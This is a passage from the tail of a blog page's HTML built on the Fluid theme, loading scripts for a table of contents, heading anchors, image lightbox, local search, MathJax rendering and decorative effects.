      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/js/DynamicLine.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-MML-AM_CHTML"></script>Copy
</body>
</html>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--鼠标点击礼花特效-->
<script async src="/js/fireworks.js"></script>